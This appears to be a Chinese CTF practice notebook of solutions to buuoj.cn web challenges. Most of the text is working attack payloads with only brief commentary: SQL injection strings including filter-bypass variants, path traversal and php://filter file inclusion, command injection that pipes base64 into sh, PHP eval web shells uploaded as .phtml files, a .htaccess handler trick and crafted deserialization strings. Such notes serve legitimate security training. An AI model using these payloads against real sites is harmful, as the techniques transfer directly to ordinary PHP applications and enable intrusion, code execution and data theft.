CTF刷题
WEB
buuoj.cn-[极客大挑战 2019]EasySQL
万能公式
1 and 1=1
1' and '1'='1
1 or 1=1
1' or '1'='1
http://43ffd150-ad6f-4a6f-bfe1-09e4486466fd.node4.buuoj.cn:81/check.php?username=1'or '1'='1&password=1'or '1'='1
[极客大挑战 2019]Havefun
右键查看源码
<!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
-->
http://1c4bde13-b1bc-47b9-a000-2a2ab8f02b70.node4.buuoj.cn:81/?cat=dog
[HCTF 2018]WarmUp
简单的php代码审计。
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
payload:
62704325-c9b0-4e15-bdad-cc1495651f9c.node4.buuoj.cn:81/?file=hint.php?../../../../../../../../ffffllllaaaagggg
参考链接:
https://blog.csdn.net/qq_63548648/article/details/128067255
[ACTF2020 新生赛]Include
文件包含:
http://feadec16-bcf9-4fcf-a5e0-0df54c397f7b.node4.buuoj.cn:81/?
file=php://filter/convert.base64-encode/resource=flag.php
index.php源码:
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
exit('hacker!');
}
if($file){
include($file);
}else{
echo '<a href="?file=flag.php">tips</a>';
}
?>
文件包含参考链接:
https://www.anquanke.com/post/id/248627#h3-11
[ACTF2020 新生赛]Exec
命令执行
127.0.0.1;cat /flag
[GXYCTF2019]Ping Ping Ping
http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1|cat$IFS$1index.php
index.php源码:
<?php
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "<pre>";
print_r($a);
}
?>
方法一:
变量拼接:
http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
方法二:
base64编码绕过
echo "cat flag.php"|base64
生成base64 Y2F0IGZsYWcucGhwCg==
http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1|
echo$IFS$1Y2F0IGZsYWcucGhwCg==$IFS$1|$IFS$1base64$IFS$1-d$IFS$1|$IFS$1sh
命令执行绕过姿势参考文章
https://blog.csdn.net/m0_64815693/article/details/127268809
http://www.360doc.com/content/21/0909/17/71923083_994810060.shtml
[SUCTF 2019]EasySQL
第一种方法:
1;set sql_mode=PIPES_AS_CONCAT;select 1
第二种方法:
*,1
[极客大挑战 2019]Secret File
简单的文件包含
http://b0072723-9ac4-4df9-a175-77d60e59735a.node4.buuoj.cn:81/Archive_room.php
burpsuite抓包
/secr3t.php
简单的php文件包含
/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
[极客大挑战 2019]LoveSQL
注意#使用 %23
/check.php?username=1' union select 1,database(),version()%23&password=1
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
[极客大挑战 2019]Http
http协议更改
X-Forwarded-For: 127.0.0.1
Referer: https://Sycsecret.buuoj.cn
User-Agent: "Syclover" browser
发送的请求头:
GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:26614
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Referer: https://Sycsecret.buuoj.cn
User-Agent: "Syclover" browser
[极客大挑战 2019]Knife
不用动脑的题目,直接菜刀或者shell管理工具链接过去就行。
[极客大挑战 2019]Upload
文件头绕过
GIF89a
文件名后缀phtml绕过
Content-Disposition: form-data; name="file"; filename="flag.phtml"
Content-Type: image/png
GIF89a
<script language='php'>@eval($_POST[shell]);</script>
shell连接地址upload/flag.phtml
[ACTF2020 新生赛]Upload
上传phtml
POST / HTTP/1.1
Host: 684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------145469643534879765234084248244
Content-Length: 402
Origin: http://684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81
Connection: close
Referer: http://684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81/
Upgrade-Insecure-Requests: 1
-----------------------------145469643534879765234084248244
Content-Disposition: form-data; name="upload_file"; filename="1111.phtml"
Content-Type: image/jpeg
<script language='php'>@eval($_POST[shell]);</script>
-----------------------------145469643534879765234084248244
Content-Disposition: form-data; name="submit"
upload
-----------------------------145469643534879765234084248244--
[极客大挑战 2019]BabySQL
双写绕过
username=admin&password=123456' ununionion selselectect 1,2,3 %23
username=admin&password=123456' ununionion selselectect 1,2,database() %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(schema_name) from information_schema.schemata %23
admin&password=123456' ununionion selselectect 1,2,group_concat(schema_name) frfromom (infoorrmation_schema.schemata) %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(table_name) frfromom (infoorrmation_schema.tables) whwhereere table_schema='ctf' %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_schema='ctf' and table_name='Flag' %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_schema='ctf' aandnd table_name='Flag' %23
username=admin&password=123456' ununionion selselectect 1,2,flag frfromom ctf.Flag %23
[极客大挑战 2019]PHP
反序列化题目。
知识点:网站备份+wakeup绕过
注意空格,使用%00绕过。
http://bc2f74ae-5a22-4516-91f4-c0a3620d0016.node4.buuoj.cn:81/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
参考连接:https://blog.csdn.net/qq_58166735/article/details/128248384
[ACTF2020 新生赛]BackupFile
知识点:寻找备份文件+php弱类型比较
备份文件:index.php.bak
http://89295bcb-1c0e-4e2b-a068-42add2e5e913.node4.buuoj.cn:81/index.php?key=123
[RoarCTF 2019]Easy Calc
查看phpinfo,发现禁用了大部分函数。
下面使用函数:var_dump()、scandir()进行绕过。
? num=var_dump(scandir(chr(47)))
num=file_get_contents(/f1agg) 转化为:
num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
使用python将字符串转化为ascii字符,绕过waf对字母数字的限制。
str1 = "/f1agg"
flag = ""
for char in str1:
flag += "chr("+str(ord(char))+")."
print(flag.rstrip('.'))
参考连接:
https://blog.csdn.net/m0_62905261/article/details/127027095
[极客大挑战 2019]BuyFlag
知识点:is_numeric()的绕过
源码:
if (isset($_POST['password'])) {
$password = $_POST['password'];
if (is_numeric($password)) {
echo "password can't be number</br>";
}elseif ($password == 404) {
echo "Password Right!</br>";
}
}
POST /pay.php HTTP/1.1
Host: 446f2935-4a7a-4da6-accf-a706b6f11595.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
password=404e&money[]=a
[BJDCTF2020]Easy MD5
知识点:md5的数组绕过、哈希碰撞绕过、弱类型绕过。
参考:
https://blog.csdn.net/qq_63548648/article/details/128144485
[护网杯 2018]easy_tornado
知识点:模板注入
参考链接:https://blog.csdn.net/qq_51927659/article/details/116031923
[HCTF 2018]admin
知识点:unicode欺骗、flask session 伪造、条件竞争
https://blog.csdn.net/qq_63928796/article/details/125637749
[MRCTF2020]你传你?呢
知识点:文件上传、.htaccess文件的利用
.htaccess文件
<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>
随便上传一张图片进行修改为php,写入一句话,连接shell即可获得flag。
[ZJCTF 2019]NiZhuanSiWei
知识点:php伪协议、php反序列化
http://d725a3cd-5e90-48b6-ac58-f7b643407b5e.node4.buuoj.cn:81/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D